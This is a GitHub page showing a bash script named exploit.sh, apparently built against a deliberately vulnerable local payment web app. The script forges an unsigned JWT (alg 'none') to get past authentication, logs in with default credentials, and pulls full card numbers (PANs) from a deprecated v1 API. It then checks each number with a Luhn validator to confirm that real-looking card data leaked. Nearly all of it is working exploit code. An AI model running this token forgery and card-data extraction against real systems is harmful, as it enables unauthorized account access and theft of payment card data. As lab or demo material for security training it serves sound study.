-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.sh
executable file
·95 lines (75 loc) · 2.25 KB
/
exploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#!/usr/bin/env bash
RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'
isLUHNValid() {
local pan="$1"
local panlen="${#pan}"
local sum=0
for ((i = panlen - 1; i >= 0; i--)); do
local digit="${pan:$i:1}"
if (((panlen-i) % 2 == 0)); then
#even
((digit*=2))
((${#digit} == 2)) && digit=$((${digit:0:1}+${digit:1:1}))
fi
((sum+=digit))
done
((sum % 10 == 0))
}
# Check jq installed
if ! command -v jq &> /dev/null
then
printf "${RED}ERROR: jq could not be found${NC}\n"
exit 1
fi
# BAD JWT
echo -n "Checking if unsigned JWT can be used against web app.. "
BAD_JWT=`curl -s -k \
-H $'Host: localhost:3000' \
-b $'RBRD_AUTH=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6InVzZXIxIiwiRW1haWwiOiJ1c2VyMUBleGFtcGxlLmNvbSIsImlhdCI6MTY3NTQ0NjAyOCwiZXhwIjo5OTk5OTk5OTk5fQ.' \
$'http://localhost:3000/api/v2/cards'`
if [[ "$?" != "0" ]]; then
printf "\t\t${RED}[Fail]${NC}\n"
exit 1
fi
BAD_JWT_SUCCESS=`echo $BAD_JWT | jq -r .message | grep success`
if [[ "$BAD_JWT_SUCCESS" == "success" ]]; then
printf "\t\t${GREEN}[OK]${NC}\n"
else
printf "\t\t${RED}[Fail]${NC}\n"
exit 1
fi
# AUTH
echo -n "Authenticating against web app and fetching cookie.. "
AUTH=`curl -s -k --cookie-jar curl_cookie_jar.txt -X $'POST' \
-H $'Host: localhost:3000' -H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'Email=user1%40example.com&Password=user1' \
$'http://localhost:3000/api/login'`
if [[ "$?" == "0" ]]; then
printf "\t\t${GREEN}[OK]${NC}\n"
else
printf "\t\t${RED}[Fail]${NC}\n"
exit 1
fi
# VULNERABLE ENDPOINT ACCESSIBLE?
echo -n "Checking if deprecated API endpoint is accessible.. "
JSON=`curl -s --cookie curl_cookie_jar.txt \
-H $'Host: localhost:3000' \
$'http://localhost:3000/api/v1/cards'`
if jq -e . >/dev/null 2>&1 <<<"$JSON"; then
printf "\t\t${GREEN}[Accessible]${NC}\n"
else
printf "\t\t${RED}[Invalid JSON]${NC}\n"
exit 1
fi
echo -n "Checking if deprecated API endpoint is returning card info.. "
# VALID PAN RETURNED?
PAN=`echo $JSON | jq -r '.data[0].PAN' | grep -E "[0-9]{14,19}"`
isLUHNValid $PAN
if [[ "$?" == "0" ]]; then
printf "\t${GREEN}[Valid PAN returned]${NC}\n"
else
printf "\t${RED}[Invalid PAN returned]${NC}\n"
exit 1
fi